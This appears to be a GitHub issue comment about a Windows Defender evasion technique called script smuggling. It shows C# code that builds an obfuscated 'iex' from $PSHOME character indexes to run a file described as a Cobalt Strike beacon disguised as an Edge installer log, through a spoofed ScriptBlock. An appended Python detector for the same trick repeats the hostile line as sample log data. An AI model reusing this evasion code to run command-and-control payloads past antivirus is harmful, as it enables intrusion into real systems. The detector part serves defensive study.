A very nice anti-detection idea; however, my sample can still be detected by Windows Defender. Here is the demo code:
```csharp
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
...
namespace ScriptSmuggling
{
    public class Program
    {
        public static void Main()
        {
            // the msedge_installer.log is an obfuscated cobaltstrike beacon file (.ps1). it can be executed by iex
            string script = @". ($pShOmE[4]+$PsHoMe[34]+'X') (cat C:\Windows\Temp\msedge_installer.log)";
            ScriptBlock sb = BuildSpoofedBlock(script);

            // Setup PowerShell runspace
            using (Runspace runSpace = RunspaceFactory.CreateRunspace())
            {
                runSpace.Open();
                using (PowerShell ps = PowerShell.Create())
                {
                    ps.Runspace = runSpace;
                    ps.AddCommand("Invoke-Command").AddParameter("ScriptBlock", sb);
                    Collection<PSObject> results = ps.Invoke();
                    foreach (PSObject result in results)
                    {
                        Console.WriteLine(result);
                    }

                    // Display any errors from the error stream
                    foreach (ErrorRecord error in ps.Streams.Error)
                    {
                        Console.WriteLine("ERROR: " + error);
                    }
                }
            }
        }

        public static ScriptBlock BuildSpoofedBlock(string content)
        {
...
        }
    }
}
```
Maybe the `executableAst` is still being checked by wdfdr?
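A defender-side companion to the comment above, added here and not part of the issue or the project: it resolves the `$PSHOME[n]` character-index trick the demo script uses to spell `iex` and flags it in ScriptBlock log text. The `$PSHOME` value, the `SUSPECT_COMMANDS` set and the log lines are constructed assumptions, not real telemetry.

```python
import re

# Assumed $PSHOME of a default Windows PowerShell 5.1 host; index lookups below
# are resolved against it, so adjust it to the logged host when checking real data.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

# Command names an indexed-string expression should never be allowed to spell.
SUSPECT_COMMANDS = {"iex", "invoke-expression"}

INDEX_RE = re.compile(r"\$pshome\[(\d+)\]", re.IGNORECASE)
TERM_RE = re.compile(r"\$pshome\[\d+\]|'[^']*'", re.IGNORECASE)
GROUP_RE = re.compile(r"\(([^()]*\$pshome\[\d+\][^()]*)\)", re.IGNORECASE)


def resolve_indexed_string(expr, pshome=PSHOME):
    """Evaluate a '+'-joined run of $PSHOME[n] lookups and single-quoted literals."""
    out = []
    for term in TERM_RE.findall(expr):
        m = INDEX_RE.fullmatch(term)
        if m:
            i = int(m.group(1))
            out.append(pshome[i] if i < len(pshome) else "")
        else:
            out.append(term[1:-1])  # strip the surrounding single quotes
    return "".join(out)


def find_hidden_invocations(script_text, pshome=PSHOME):
    """Return resolved names of suspect commands hidden behind $PSHOME indexing."""
    hits = []
    for group in GROUP_RE.findall(script_text):
        resolved = resolve_indexed_string(group, pshome)
        if resolved.lower() in SUSPECT_COMMANDS:
            hits.append(resolved)
    return hits


# Constructed lines in the shape of Event ID 4104 ScriptBlockText, for illustration only.
SAMPLE_LOG = [
    r". ($pShOmE[4]+$PsHoMe[34]+'X') (cat C:\Windows\Temp\msedge_installer.log)",
    r"Get-Process | Where-Object { $_.CPU -gt 100 }",
    r"& ($PSHOME[4]+$PSHOME[5]+$PSHOME[6]) 'a'",  # resolves to 'ind': not flagged
]


def scan_log(lines, pshome=PSHOME):
    """Return (line_number, hits) for every line that hides a suspect command."""
    return [(n, h) for n, line in enumerate(lines, 1)
            if (h := find_hidden_invocations(line, pshome))]
```

The first sample line resolves to `ieX`, i.e. the `iex` alias, while the third resolves to a harmless string and is ignored.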